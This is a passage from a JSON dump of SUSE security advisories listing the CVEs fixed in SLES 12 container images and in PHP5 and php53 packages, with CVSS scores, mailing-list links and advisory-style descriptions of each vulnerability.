CVE-2017-10684\n - CVE-2017-10685\n - CVE-2017-11112\n - CVE-2017-11113\n\n libksba:\n\n - CVE-2016-4574\n - CVE-2016-4579\n\n libgcrypt:\n\n - CVE-2015-7511\n - CVE-2016-6313\n - CVE-2017-7526\n\n dbus-1:\n\n - CVE-2014-7824\n - CVE-2015-0245\n\n Finally, the following packages received non-security fixes:\n\n - augeas\n - bzip2\n - ca-certificates-mozilla\n - coreutils\n - cryptsetup\n - cyrus-sasl\n - dirmngr\n - e2fsprogs\n - findutils\n - gpg2\n - insserv-compat\n - kmod\n - libcap\n - libsolv\n - libzypp\n - openldap2\n - p11-kit\n - permissions\n - procps\n - rpm\n - sed\n - shadow\n - zypper\n\n", "published": "2017-10-11T03:06:53", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html", "cvelist": ["CVE-2016-6262", "CVE-2017-7407", "CVE-2015-8388", "CVE-2016-8620", "CVE-2016-8623", "CVE-2017-9233", "CVE-2016-5420", "CVE-2016-9840", "CVE-2016-3705", "CVE-2016-1840", "CVE-2014-0191", "CVE-2016-8615", "CVE-2016-8616", "CVE-2015-5276", "CVE-2015-3210", "CVE-2015-2325", "CVE-2016-6261", "CVE-2016-8619", "CVE-2017-10685", "CVE-2016-6306", "CVE-2016-2183", "CVE-2016-2178", "CVE-2015-8391", "CVE-2016-6263", "CVE-2016-2108", "CVE-2016-9063", "CVE-2016-8618", "CVE-2016-1762", "CVE-2016-6302", "CVE-2016-5300", "CVE-2015-8395", "CVE-2016-7141", "CVE-2016-1834", "CVE-2017-11112", "CVE-2016-2177", "CVE-2014-7169", "CVE-2015-8382", "CVE-2016-3627", "CVE-2015-1283", "CVE-2014-6277", "CVE-2016-2105", "CVE-2016-9318", "CVE-2016-4483", "CVE-2016-2107", "CVE-2015-8386", "CVE-2014-6278", "CVE-2015-2327", "CVE-2017-9049", "CVE-2016-3075", "CVE-2016-8617", "CVE-2016-9842", "CVE-2016-7796", "CVE-2017-2616", "CVE-2016-0634", "CVE-2012-6702", "CVE-2015-3238", "CVE-2016-2180", "CVE-2016-1835", "CVE-2016-0787", "CVE-2016-1234", "CVE-2016-0718", "CVE-2016-6185", "CVE-2015-8392", "CVE-2016-4574", "CVE-2015-8389", "CVE-2016-2109", "CVE-2015-8380", "CVE-2016-2181", "CVE-2016-6304", "CVE-2016-4449", "CVE-2017-9048", "CVE-2014-8964", "CVE-2015-2059", "CVE-2017-11113", "CVE-2016-1283", "CVE-2016-6313", "CVE-2016-1837", "CVE-2016-6318", "CVE-2015-3622", "CVE-2016-4448", "CVE-2016-1238", "CVE-2015-8393", "CVE-2016-1838", "CVE-2016-3706", "CVE-2016-4429", "CVE-2016-2381", "CVE-2016-7543", "CVE-2017-1000101", "CVE-2016-8622", "CVE-2015-8853", "CVE-2014-7187", "CVE-2015-8394", "CVE-2016-4008", "CVE-2014-9770", "CVE-2015-3217", "CVE-2014-6271", "CVE-2017-7526", "CVE-2016-3191", "CVE-2017-1000366", "CVE-2016-1839", "CVE-2016-8624", "CVE-2015-8384", "CVE-2016-9843", "CVE-2017-9047", "CVE-2015-8948", "CVE-2014-7824", "CVE-2015-8842", "CVE-2016-9597", "CVE-2015-5218", "CVE-2016-6303", "CVE-2015-8383", "CVE-2017-1000100", "CVE-2015-8381", "CVE-2016-2182", "CVE-2016-5421", "CVE-2016-9586", "CVE-2015-5073", "CVE-2016-4447", "CVE-2016-5011", "CVE-2015-7511", "CVE-2015-8385", "CVE-2015-8806", "CVE-2016-9841", "CVE-2016-4579", "CVE-2015-0245", "CVE-2016-2037", "CVE-2016-2073", "CVE-2016-5419", "CVE-2015-2328", "CVE-2017-6507", "CVE-2016-4658", "CVE-2016-7167", "CVE-2017-10684", "CVE-2016-2179", "CVE-2016-2106", "CVE-2016-1833", "CVE-2015-8387", "CVE-2016-8621", "CVE-2015-8390", "CVE-2017-9050"], "lastseen": "2017-10-11T05:54:19"}, {"id": "SUSE-SU-2017:2700-1", "type": "suse", "title": "Security update for SLES 12-SP1 Docker image (important)", "description": "The SUSE Linux Enterprise Server 12 SP1 container image has been updated\n to include security and stability fixes.\n\n The following issues related to building of the container images have been\n fixed:\n\n - Included krb5 package to avoid the inclusion of krb5-mini which gets\n selected as a dependency by the Build Service solver. (bsc#1056193)\n - Do not install recommended packages when building container images.\n (bsc#975726)\n\n A number of security issues that have been already fixed by updates\n released for SUSE Linux Enterprise Server 12 SP1 are now included in the\n base image. A package/CVE cross-reference is available below.\n\n pam:\n\n - CVE-2015-3238\n\n libtasn1:\n\n - CVE-2015-3622\n - CVE-2016-4008\n\n expat:\n\n expat:\n\n - CVE-2012-6702\n - CVE-2015-1283\n - CVE-2016-0718\n - CVE-2016-5300\n - CVE-2016-9063\n - CVE-2017-9233\n\n libidn:\n\n - CVE-2015-2059\n - CVE-2015-8948\n - CVE-2016-6261\n - CVE-2016-6262\n - CVE-2016-6263\n\n\n zlib:\n\n - CVE-2016-9840\n - CVE-2016-9841\n - CVE-2016-9842\n - CVE-2016-9843\n\n curl:\n\n - CVE-2016-5419\n - CVE-2016-5420\n - CVE-2016-5421\n - CVE-2016-7141\n - CVE-2016-7167\n - CVE-2016-8615\n - CVE-2016-8616\n - CVE-2016-8617\n - CVE-2016-8618\n - CVE-2016-8619\n - CVE-2016-8620\n - CVE-2016-8621\n - CVE-2016-8622\n - CVE-2016-8623\n - CVE-2016-8624\n - CVE-2016-9586\n - CVE-2017-1000100\n - CVE-2017-1000101\n - CVE-2017-7407\n\n openssl:\n\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2177\n - CVE-2016-2178\n - CVE-2016-2179\n - CVE-2016-2180\n - CVE-2016-2181\n - CVE-2016-2182\n - CVE-2016-2183\n - CVE-2016-6302\n - CVE-2016-6303\n - CVE-2016-6304\n - CVE-2016-6306\n - CVE-2016-7056\n - CVE-2016-8610\n - CVE-2017-3731\n\n cracklib:\n\n - CVE-2016-6318\n\n pcre:\n\n - CVE-2014-8964\n - CVE-2015-2325\n - CVE-2015-2327\n - CVE-2015-2328\n - CVE-2015-3210\n - CVE-2015-3217\n - CVE-2015-5073\n - CVE-2015-8380\n - CVE-2015-8381\n - CVE-2015-8382\n - CVE-2015-8383\n - CVE-2015-8384\n - CVE-2015-8385\n - CVE-2015-8386\n - CVE-2015-8387\n - CVE-2015-8388\n - CVE-2015-8389\n - CVE-2015-8390\n - CVE-2015-8391\n - CVE-2015-8392\n - CVE-2015-8393\n - CVE-2015-8394\n - CVE-2015-8395\n - CVE-2016-1283\n - CVE-2016-3191\n\n appamor:\n\n - CVE-2017-6507\n\n bash:\n\n - CVE-2014-6277\n - CVE-2014-6278\n - CVE-2016-0634\n - CVE-2016-7543\n\n cpio:\n\n - CVE-2016-2037\n\n glibc:\n\n - CVE-2016-1234\n - CVE-2016-3075\n - CVE-2016-3706\n - CVE-2016-4429\n - CVE-2017-1000366\n\n perl:\n\n - CVE-2015-8853\n - CVE-2016-1238\n - CVE-2016-2381\n - CVE-2016-6185\n\n libssh2_org:\n\n - CVE-2016-0787\n\n util-linux:\n\n - CVE-2016-5011\n - CVE-2017-2616\n\n ncurses:\n\n - CVE-2017-10684\n - CVE-2017-10685\n - CVE-2017-11112\n - CVE-2017-11113\n\n libksba:\n\n - CVE-2016-4574\n - CVE-2016-4579\n\n libxml2:\n\n - CVE-2014-0191\n - CVE-2015-8806\n - CVE-2016-1762\n - CVE-2016-1833\n - CVE-2016-1834\n - CVE-2016-1835\n - CVE-2016-1837\n - CVE-2016-1838\n - CVE-2016-1839\n - CVE-2016-1840\n - CVE-2016-2073\n - CVE-2016-3627\n - CVE-2016-3705\n - CVE-2016-4447\n - CVE-2016-4448\n - CVE-2016-4449\n - CVE-2016-4483\n - CVE-2016-4658\n - CVE-2016-9318\n - CVE-2016-9597\n - CVE-2017-9047\n - CVE-2017-9048\n - CVE-2017-9049\n - CVE-2017-9050\n\n libgcrypt:\n\n - CVE-2015-7511\n - CVE-2016-6313\n - CVE-2017-7526\n\n update-alternatives:\n\n - CVE-2015-0860\n\n systemd:\n\n - CVE-2014-9770\n - CVE-2015-8842\n - CVE-2016-7796\n\n dbus-1:\n\n - CVE-2014-7824\n - CVE-2015-0245\n\n Finally, the following packages received non-security fixes:\n\n - augeas\n - bzip2\n - ca-certificates-mozilla\n - coreutils\n - cryptsetup\n - cyrus-sasl\n - dirmngr\n - e2fsprogs\n - findutils\n - gpg2\n - insserv-compat\n - kmod\n - libcap\n - libsolv\n - libzypp\n - lua51\n - lvm2\n - netcfg\n - p11-kit\n - permissions\n - procps\n - rpm\n - sed\n - sg3_utils\n - shadow\n - zypper\n\n", "published": "2017-10-11T03:07:32", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html", "cvelist": ["CVE-2016-6262", "CVE-2016-7056", "CVE-2017-7407", "CVE-2015-8388", "CVE-2016-8620", "CVE-2016-8623", "CVE-2017-9233", "CVE-2016-5420", "CVE-2016-9840", "CVE-2016-3705", "CVE-2016-1840", "CVE-2014-0191", "CVE-2016-8615", "CVE-2016-8616", "CVE-2015-5276", "CVE-2015-3210", "CVE-2015-2325", "CVE-2016-6261", "CVE-2016-8619", "CVE-2017-10685", "CVE-2016-6306", "CVE-2016-2183", "CVE-2015-0860", "CVE-2016-2178", "CVE-2015-8391", "CVE-2016-6263", "CVE-2016-2108", "CVE-2016-9063", "CVE-2016-8618", "CVE-2016-1762", "CVE-2016-6302", "CVE-2016-5300", "CVE-2015-8395", "CVE-2016-7141", "CVE-2016-1834", "CVE-2017-11112", "CVE-2016-2177", "CVE-2014-7169", "CVE-2015-8382", "CVE-2016-3627", "CVE-2015-1283", "CVE-2014-6277", "CVE-2016-2105", "CVE-2016-9318", "CVE-2016-4483", "CVE-2016-2107", "CVE-2017-3731", "CVE-2015-8386", "CVE-2014-6278", "CVE-2015-2327", "CVE-2017-9049", "CVE-2016-3075", "CVE-2016-8617", "CVE-2016-9842", "CVE-2016-7796", "CVE-2017-2616", "CVE-2016-0634", "CVE-2012-6702", "CVE-2015-3238", "CVE-2016-2180", "CVE-2016-1835", "CVE-2016-0787", "CVE-2016-8610", "CVE-2016-1234", "CVE-2016-0718", "CVE-2016-6185", "CVE-2015-8392", "CVE-2016-4574", "CVE-2015-8389", "CVE-2016-2109", "CVE-2015-8380", "CVE-2016-2181", "CVE-2016-6304", "CVE-2016-4449", "CVE-2017-9048", "CVE-2014-8964", "CVE-2015-2059", "CVE-2017-11113", "CVE-2016-1283", "CVE-2016-6313", "CVE-2016-1837", "CVE-2016-6318", "CVE-2015-3622", "CVE-2016-4448", "CVE-2016-1238", "CVE-2015-8393", "CVE-2016-1838", "CVE-2016-3706", "CVE-2016-4429", "CVE-2016-2381", "CVE-2016-7543", "CVE-2017-1000101", "CVE-2016-8622", "CVE-2015-8853", "CVE-2014-7187", "CVE-2015-8394", "CVE-2016-4008", "CVE-2014-9770", "CVE-2015-3217", "CVE-2014-6271", "CVE-2017-7526", "CVE-2016-3191", "CVE-2017-1000366", "CVE-2016-1839", "CVE-2016-8624", "CVE-2015-8384", "CVE-2016-9843", "CVE-2017-9047", "CVE-2015-8948", "CVE-2014-7824", "CVE-2015-8842", "CVE-2016-9597", "CVE-2016-6303", "CVE-2015-8383", "CVE-2017-1000100", "CVE-2015-8381", "CVE-2016-2182", "CVE-2016-5421", "CVE-2016-9586", "CVE-2015-5073", "CVE-2016-4447", "CVE-2016-5011", "CVE-2015-7511", "CVE-2015-8385", "CVE-2015-8806", "CVE-2016-9841", "CVE-2016-4579", "CVE-2015-0245", "CVE-2016-2037", "CVE-2016-2073", "CVE-2016-5419", "CVE-2015-2328", "CVE-2017-6507", "CVE-2016-4658", "CVE-2016-7167", "CVE-2017-10684", "CVE-2016-2179", "CVE-2016-2106", "CVE-2016-1833", "CVE-2015-8387", "CVE-2016-8621", "CVE-2015-8390", "CVE-2017-9050"], "lastseen": "2017-10-11T05:54:20"}, {"id": "SUSE-SU-2015:1253-2", "type": "suse", "title": "Security update for php5 (important)", "description": "This security update of PHP fixes the following issues:\n\n Security issues fixed:\n\n * CVE-2015-4024 [bnc#931421]: Fixed multipart/form-data remote DOS\n Vulnerability.\n * CVE-2015-4026 [bnc#931776]: pcntl_exec() did not check path validity.\n * CVE-2015-4022 [bnc#931772]: Fixed and overflow in ftp_genlist() that\n resulted in a heap overflow.\n * CVE-2015-4021 [bnc#931769]: Fixed memory corruption in\n phar_parse_tarfile when entry filename starts with NULL.\n * CVE-2015-4148 [bnc#933227]: Fixed SoapClient's do_soap_call() type\n confusion after unserialize() information disclosure.\n * CVE-2015-4602 [bnc#935224]: Fixed an incomplete Class unserialization\n type confusion.\n * CVE-2015-4599, CVE-2015-4600, CVE-2015-4601 [bnc#935226]: Fixed type\n confusion issues in unserialize() with various SOAP methods.\n * CVE-2015-4603 [bnc#935234]: Fixed exception::getTraceAsString type\n confusion issue after unserialize.\n * CVE-2015-4644 [bnc#935274]: Fixed a crash in php_pgsql_meta_data.\n * CVE-2015-4643 [bnc#935275]: Fixed an integer overflow in ftp_genlist()\n that could result in a heap overflow.\n * CVE-2015-3411, CVE-2015-3412, CVE-2015-4598 [bnc#935227], [bnc#935232]:\n Added missing null byte checks for paths in various PHP extensions.\n\n Bugs fixed:\n\n * configure php-fpm with --localstatedir=/var [bnc#927147]\n * fix timezone map [bnc#919080]\n\n", "published": "2015-07-17T11:08:12", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00027.html", "cvelist": ["CVE-2015-4601", "CVE-2015-4644", "CVE-2015-4148", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-4643"], "lastseen": "2016-09-04T11:28:40"}, {"id": "SUSE-SU-2015:1253-1", "type": "suse", "title": "Security update for php5 (important)", "description": "This security update of PHP fixes the following issues:\n\n Security issues fixed:\n\n * CVE-2015-4024 [bnc#931421]: Fixed multipart/form-data remote DOS\n Vulnerability.\n * CVE-2015-4026 [bnc#931776]: pcntl_exec() did not check path validity.\n * CVE-2015-4022 [bnc#931772]: Fixed and overflow in ftp_genlist() that\n resulted in a heap overflow.\n * CVE-2015-4021 [bnc#931769]: Fixed memory corruption in\n phar_parse_tarfile when entry filename starts with NULL.\n * CVE-2015-4148 [bnc#933227]: Fixed SoapClient's do_soap_call() type\n confusion after unserialize() information disclosure.\n * CVE-2015-4602 [bnc#935224]: Fixed an incomplete Class unserialization\n type confusion.\n * CVE-2015-4599, CVE-2015-4600, CVE-2015-4601 [bnc#935226]: Fixed type\n confusion issues in unserialize() with various SOAP methods.\n * CVE-2015-4603 [bnc#935234]: Fixed exception::getTraceAsString type\n confusion issue after unserialize.\n * CVE-2015-4644 [bnc#935274]: Fixed a crash in php_pgsql_meta_data.\n * CVE-2015-4643 [bnc#935275]: Fixed an integer overflow in ftp_genlist()\n that could result in a heap overflow.\n * CVE-2015-3411, CVE-2015-3412, CVE-2015-4598 [bnc#935227], [bnc#935232]:\n Added missing null byte checks for paths in various PHP extensions.\n\n Bugs fixed:\n\n * configure php-fpm with --localstatedir=/var [bnc#927147]\n * fix timezone map [bnc#919080]\n\n", "published": "2015-07-17T10:12:10", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00026.html", "cvelist": ["CVE-2015-4601", "CVE-2015-4644", "CVE-2015-4148", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-4643"], "lastseen": "2016-09-04T11:43:58"}, {"id": "SUSE-SU-2016:1638-1", "type": "suse", "title": "Security update for php53 (important)", "description": "This update for php53 to version 5.3.17 fixes the following issues:\n\n These security issues were fixed:\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read (bnc#982010).\n - CVE-2016-5094: Don't create strings with lengths outside int range\n (bnc#982011).\n - CVE-2016-5095: Don't create strings with lengths outside int range\n (bnc#982012).\n - CVE-2016-5096: int/size_t confusion in fread (bsc#982013).\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow (bnc#982162).\n - CVE-2015-8879: The odbc_bindcols function in ext/odbc/php_odbc.c in PHP\n mishandles driver behavior for SQL_WVARCHAR columns, which allowed\n remote attackers to cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the odbc_fetch_array\n function to access a certain type of Microsoft SQL Server table\n (bsc#981050).\n - CVE-2015-4116: Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP allowed remote attackers to\n execute arbitrary code by triggering a failed SplMinHeap::compare\n operation (bsc#980366).\n - CVE-2015-8874: Stack consumption vulnerability in GD in PHP allowed\n remote attackers to cause a denial of service via a crafted\n imagefilltoborder call (bsc#980375).\n - CVE-2015-8873: Stack consumption vulnerability in Zend/zend_exceptions.c\n in PHP allowed remote attackers to cause a denial of service\n (segmentation fault) via recursive method calls (bsc#980373).\n - CVE-2016-4540: The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829).\n - CVE-2016-4541: The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829.\n - CVE-2016-4542: The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP did not properly construct spprintf arguments, which allowed remote\n attackers to cause a denial of service (out-of-bounds read) or possibly\n have unspecified other impact via crafted header data (bsc#978830).\n - CVE-2016-4543: The exif_process_IFD_in_JPEG function in ext/exif/exif.c\n in PHP did not validate IFD sizes, which allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4544: The exif_process_TIFF_in_JPEG function in ext/exif/exif.c\n in PHP did not validate TIFF start data, which allowed remote attackers\n to cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4537: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n accepted a negative integer for the scale argument, which allowed remote\n attackers to cause a denial of service or possibly have unspecified\n other impact via a crafted call (bsc#978827).\n - CVE-2016-4538: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n modified certain data structures without considering whether they are\n copies of the _zero_, _one_, or _two_ global variable, which allowed\n remote attackers to cause a denial of service or possibly have\n unspecified other impact via a crafted call (bsc#978827).\n - CVE-2016-4539: The xml_parse_into_struct function in ext/xml/xml.c in\n PHP allowed remote attackers to cause a denial of service (buffer\n under-read and segmentation fault) or possibly have unspecified other\n impact via crafted XML data in the second argument, leading to a parser\n level of zero (bsc#978828).\n - CVE-2016-4342: ext/phar/phar_object.c in PHP mishandles zero-length\n uncompressed data, which allowed remote attackers to cause a denial of\n service (heap memory corruption) or possibly have unspecified other\n impact via a crafted (1) TAR, (2) ZIP, or (3) PHAR archive (bsc#977991).\n - CVE-2016-4346: Integer overflow in the str_pad function in\n ext/standard/string.c in PHP allowed remote attackers to cause a denial\n of service or possibly have unspecified other impact via a long string,\n leading to a heap-based buffer overflow (bsc#977994).\n - CVE-2016-4073: Multiple integer overflows in the mbfl_strcut function in\n ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP allowed remote attackers to\n cause a denial of service (application crash) or possibly execute\n arbitrary code via a crafted mb_strcut call (bsc#977003).\n - CVE-2015-8867: The openssl_random_pseudo_bytes function in\n ext/openssl/openssl.c in PHP incorrectly relied on the deprecated\n RAND_pseudo_bytes function, which made it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors\n (bsc#977005).\n - CVE-2016-4070: Integer overflow in the php_raw_url_encode function in\n ext/standard/url.c in PHP allowed remote attackers to cause a denial of\n service (application crash) via a long string to the rawurlencode\n function (bsc#976997).\n - CVE-2015-8866: ext/libxml/libxml.c in PHP when PHP-FPM is used, did not\n isolate each thread from libxml_disable_entity_loader changes in other\n threads, which allowed remote attackers to conduct XML External Entity\n (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document,\n a related issue to CVE-2015-5161 (bsc#976996).\n - CVE-2015-8838: ext/mysqlnd/mysqlnd.c in PHP used a client SSL option to\n mean that SSL is optional, which allowed man-in-the-middle attackers to\n spoof servers via a cleartext-downgrade attack, a related issue to\n CVE-2015-3152 (bsc#973792).\n - CVE-2015-8835: The make_http_soap_request function in\n ext/soap/php_http.c in PHP did not properly retrieve keys, which allowed\n remote attackers to cause a denial of service (NULL pointer dereference,\n type confusion, and application crash) or possibly execute arbitrary\n code via crafted serialized data representing a numerically indexed\n _cookies array, related to the SoapClient::__call method in\n ext/soap/soap.c (bsc#973351).\n - CVE-2016-3141: Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP allowed remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly have unspecified\n other impact by triggering a wddx_deserialize call on XML data\n containing a crafted var element (bsc#969821).\n - CVE-2016-3142: The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a PK\\x05\\x06\n signature at an invalid location (bsc#971912).\n - CVE-2014-9767: Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in PHP\n ext/zip/ext_zip.cpp in HHVM allowed remote attackers to create arbitrary\n empty directories via a crafted ZIP archive (bsc#971612).\n - CVE-2016-3185: The make_http_soap_request function in\n ext/soap/php_http.c in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized _cookies data,\n related to the SoapClient::__call method in ext/soap/soap.c (bsc#971611).\n - CVE-2016-2554: Stack-based buffer overflow in ext/phar/tar.c in PHP\n allowed remote attackers to cause a denial of service (application\n crash) or possibly have unspecified other impact via a crafted TAR\n archive (bsc#968284).\n - CVE-2015-7803: The phar_get_entry_data function in ext/phar/util.c in\n PHP allowed remote attackers to cause a denial of service (NULL pointer\n dereference and application crash) via a .phar file with a crafted TAR\n archive entry in which the Link indicator references a file that did not\n exist (bsc#949961).\n - CVE-2015-6831: Multiple use-after-free vulnerabilities in SPL in PHP\n allowed remote attackers to execute arbitrary code via vectors involving\n (1) ArrayObject, (2) SplObjectStorage, and (3) SplDoublyLinkedList,\n which are mishandled during unserialization (bsc#942291).\n - CVE-2015-6833: Directory traversal vulnerability in the PharData class\n in PHP allowed remote attackers to write to arbitrary files via a ..\n (dot dot) in a ZIP archive entry that is mishandled during an extractTo\n call (bsc#942296.\n - CVE-2015-6836: The SoapClient __call method in ext/soap/soap.c in PHP\n did not properly manage headers, which allowed remote attackers to\n execute arbitrary code via crafted serialized data that triggers a "type\n confusion" in the serialize_function_call function (bsc#945428).\n - CVE-2015-6837: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider\n the possibility of a NULL valuePop return value proceeding with a free\n operation during initial error checking, which allowed remote attackers\n to cause a denial of service (NULL pointer dereference and application\n crash) via a crafted XML document, a different vulnerability than\n CVE-2015-6838 (bsc#945412).\n - CVE-2015-6838: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider\n the possibility of a NULL valuePop return value proceeding with a free\n operation after the principal argument loop, which allowed remote\n attackers to cause a denial of service (NULL pointer dereference and\n application crash) via a crafted XML document, a different vulnerability\n than CVE-2015-6837 (bsc#945412).\n - CVE-2015-5590: Stack-based buffer overflow in the phar_fix_filepath\n function in ext/phar/phar.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via a large\n length value, as demonstrated by mishandling of an e-mail attachment by\n the imap PHP extension (bsc#938719).\n - CVE-2015-5589: The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP did not validate a file pointer a close\n operation, which allowed remote attackers to cause a denial of service\n (segmentation fault) or possibly have unspecified other impact via a\n crafted TAR archive that is mishandled in a Phar::convertToData call\n (bsc#938721).\n - CVE-2015-4602: The __PHP_Incomplete_Class function in\n ext/standard/incomplete_class.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935224).\n - CVE-2015-4599: The SoapFault::__toString method in ext/soap/soap.c in\n PHP allowed remote attackers to obtain sensitive information, cause a\n denial of service (application crash), or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935226).\n - CVE-2015-4600: The SoapClient implementation in PHP allowed remote\n attackers to cause a denial of service (application crash) or possibly\n execute arbitrary code via an unexpected data type, related to "type\n confusion" issues in the (1) SoapClient::__getLastRequest, (2)\n SoapClient::__getLastResponse, (3) SoapClient::__getLastRequestHeaders,\n (4) SoapClient::__getLastResponseHeaders, (5) SoapClient::__getCookies,\n and (6) SoapClient::__setCookie methods (bsc#935226).\n - CVE-2015-4601: PHP allowed remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code via an unexpected\n data type, related to "type confusion" issues in (1)\n ext/soap/php_encoding.c, (2) ext/soap/php_http.c, and (3)\n ext/soap/soap.c, a different issue than CVE-2015-4600 (bsc#935226.\n - CVE-2015-4603: The exception::getTraceAsString function in\n Zend/zend_exceptions.c in PHP allowed remote attackers to execute\n arbitrary code via an unexpected data type, related to a "type\n confusion" issue (bsc#935234).\n - CVE-2015-4644: The php_pgsql_meta_data function in pgsql.c in the\n PostgreSQL (aka pgsql) extension in PHP did not validate token\n extraction for table names, which might allowed remote attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) via a crafted name. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2015-1352 (bsc#935274).\n - CVE-2015-4643: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow. NOTE: this vulnerability exists because of an incomplete fix\n for CVE-2015-4022 (bsc#935275).\n - CVE-2015-3411: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n load method, (2) the xmlwriter_open_uri function, (3) the finfo_file\n function, or (4) the hash_hmac_file function, as demonstrated by a\n filename\\0.xml attack that bypasses an intended configuration in which\n client users may read only .xml files (bsc#935227).\n - CVE-2015-3412: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read arbitrary files via\n crafted input to an application that calls the\n stream_resolve_include_path function in ext/standard/streamsfuncs.c, as\n demonstrated by a filename\\0.extension attack that bypasses an intended\n configuration in which client users may read files with only one\n specific extension (bsc#935229).\n - CVE-2015-4598: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n save method or (2) the GD imagepsloadfont function, as demonstrated by a\n filename\\0.html attack that bypasses an intended configuration in which\n client users may write to only .html files (bsc#935232).\n - CVE-2015-4148: The do_soap_call function in ext/soap/soap.c in PHP did\n not verify that the uri property is a string, which allowed remote\n attackers to obtain sensitive information by providing crafted\n serialized data with an int data type, related to a "type confusion"\n issue (bsc#933227).\n - CVE-2015-4024: Algorithmic complexity vulnerability in the\n multipart_buffer_headers function in main/rfc1867.c in PHP allowed\n remote attackers to cause a denial of service (CPU consumption) via\n crafted form data that triggers an improper order-of-growth outcome\n (bsc#931421).\n - CVE-2015-4026: The pcntl_exec implementation in PHP truncates a pathname\n upon encountering a \\x00 character, which might allowed remote attackers\n to bypass intended extension restrictions and execute files with\n unexpected names via a crafted first argument. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2006-7243 (bsc#931776).\n - CVE-2015-4022: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow (bsc#931772).\n - CVE-2015-4021: The phar_parse_tarfile function in ext/phar/tar.c in PHP\n did not verify that the first character of a filename is different from\n the \\0 character, which allowed remote attackers to cause a denial of\n service (integer underflow and memory corruption) via a crafted entry in\n a tar archive (bsc#931769).\n - CVE-2015-3329: Multiple stack-based buffer overflows in the\n phar_set_inode function in phar_internal.h in PHP allowed remote\n attackers to execute arbitrary code via a crafted length value in a (1)\n tar, (2) phar, or (3) ZIP archive (bsc#928506).\n - CVE-2015-2783: ext/phar/phar.c in PHP allowed remote attackers to obtain\n sensitive information from process memory or cause a denial of service\n (buffer over-read and application crash) via a crafted length value in\n conjunction with crafted serialized data in a phar archive, related to\n the phar_parse_metadata and phar_parse_pharfile functions (bsc#928511).\n - CVE-2015-2787: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages use of the unset function within an __wakeup function, a\n related issue to CVE-2015-0231 (bsc#924972).\n - CVE-2014-9709: The GetCode_ function in 